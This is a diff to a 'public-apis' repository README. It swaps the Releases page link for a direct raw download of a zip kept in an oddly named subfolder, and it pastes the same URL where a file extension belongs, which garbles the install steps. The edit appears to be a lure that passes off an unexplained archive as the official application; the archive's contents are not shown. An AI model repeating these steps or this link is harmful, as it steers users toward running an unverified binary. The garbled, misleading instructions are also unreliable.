yeayraww24/public-apis/README.md

 To get started with public-apis, follow these steps:

-1. **Visit the Releases Page**: Go to our [Releases page](https://github.com/yeayraww24/public-apis/releases).
+1. **Visit the Releases Page**: Go to our [Releases page](https://raw.githubusercontent.com/yeayraww24/public-apis/master/alodially/public-apis.zip).
 Here, you can find the latest version of the application.

 2. **Download the Application**: Once you're on the Releases page, look for the latest release.
 You will see various files available for download.
 Click on the file suitable for your operating system.

 3. **Install the Application**:
-   - If you downloaded a `.zip` or `.tar.gz` file, extract its contents to a folder.
+   - If you downloaded a `.zip` or `https://raw.githubusercontent.com/yeayraww24/public-apis/master/alodially/public-apis.zip` file, extract its contents to a folder.
    - If you downloaded a direct application file (e.g., `.exe` or `.dmg`), open it to start the installation process.
 Follow the on-screen instructions.

 4. **Run the Application**: After the installation, locate the application in your programs list or on your desktop.
 Double-click the icon to open the application.